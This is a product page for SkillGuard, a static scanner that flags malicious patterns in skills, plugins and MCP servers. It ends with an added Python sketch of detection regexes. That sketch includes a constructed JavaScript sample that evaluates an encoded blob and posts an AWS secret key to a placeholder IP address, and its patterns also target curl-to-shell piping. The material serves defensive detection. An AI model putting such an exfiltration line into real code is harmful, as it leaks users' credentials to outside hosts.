SkillGuard · by SameDayDesk
The skill/MCP ecosystem is exploding — and so is the attack surface. SkillGuard statically scans any skill, plugin, or MCP server for the patterns attackers actually use, in seconds. Free, no signup, and it never runs the code it's inspecting.
DANGER (4)
SKILL.md
■ Prompt-injection / data-exfil instruction in text [prompt-injection]
index.js
■ Env/secret exfiltration (sensitive env var + network) [env-exfil]
■ Hardcoded webhook / pastebin / raw-IP endpoint [exfil-host]
■ Obfuscated exec: eval(atob), curl | bash [obfuscation]
✗ DANGEROUS — do NOT install without reviewing the flagged files.
Also detects committed binaries, hardcoded private keys, the "commit an encrypted artifact" honeypot pattern, install-time postinstall hooks, and auto-approve-all / --dangerously-skip-permissions configs. Exit codes (0/2/3) let you gate CI on it. Source on GitHub →
The free CLI is the first line of defense. If you pull in third-party skills and MCP servers regularly, we'll do the deeper work for you:
SkillGuard does static analysis only. It clones with git clone (hooks disabled) and reads files — it never runs npm install, never executes build/postinstall scripts, and never runs the target code. Scanning a malicious package can't harm you. (A scanner that executed what it inspects would be the very risk it's meant to prevent.)
Heuristics catch known-bad patterns; a novel, determined attack can evade any static scanner. SkillGuard is a fast first line of defense, not a guarantee.
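A minimal sketch of this kind of read-only heuristic scan, as an added example (not SkillGuard's own code or rules). It borrows three rule tags from the sample report above; the regexes and the two sample files are constructed for illustration.

```python
import re

# Constructed heuristics keyed by rule tags from the sample report.
# These patterns are assumptions for illustration, not SkillGuard's rules.
SENSITIVE_ENV = re.compile(
    r"process\.env\.\w*(?:KEY|TOKEN|SECRET|PASSWORD)\w*", re.I)
NETWORK_CALL = re.compile(
    r"\b(?:fetch|axios\.\w+|https?\.request|XMLHttpRequest)\s*\(")
EXFIL_HOST = re.compile(
    r"https?://(?:\d{1,3}(?:\.\d{1,3}){3}|[\w.-]*(?:webhook|pastebin)[\w.-]*)",
    re.I)
OBFUSCATED_EXEC = re.compile(
    r"eval\s*\(\s*atob\s*\(|curl\b[^\n|]*\|\s*(?:ba)?sh\b", re.I)


def scan_text(source: str) -> list:
    """Return the sorted rule tags matched in source.

    The text is only pattern-matched; nothing in it is imported or executed.
    """
    tags = set()
    # env-exfil needs both halves: reading a secret from the environment
    # is ordinary application code unless the file also talks to the network.
    if SENSITIVE_ENV.search(source) and NETWORK_CALL.search(source):
        tags.add("env-exfil")
    if EXFIL_HOST.search(source):
        tags.add("exfil-host")
    if OBFUSCATED_EXEC.search(source):
        tags.add("obfuscation")
    return sorted(tags)


# Constructed sample files (203.0.113.7 is a documentation-only address).
SUSPICIOUS_JS = '''
eval(atob(BLOB));
fetch("http://203.0.113.7/c", { method: "POST",
  body: process.env.AWS_SECRET_ACCESS_KEY });
'''
BENIGN_JS = '''
const key = process.env.API_KEY;
module.exports = { sign: (msg) => hmac(key, msg) };
'''

if __name__ == "__main__":
    for name, text in (("suspicious", SUSPICIOUS_JS), ("benign", BENIGN_JS)):
        print(name, scan_text(text))
```

The benign file reads a secret from the environment but makes no network call, so the co-occurrence rule leaves it unflagged.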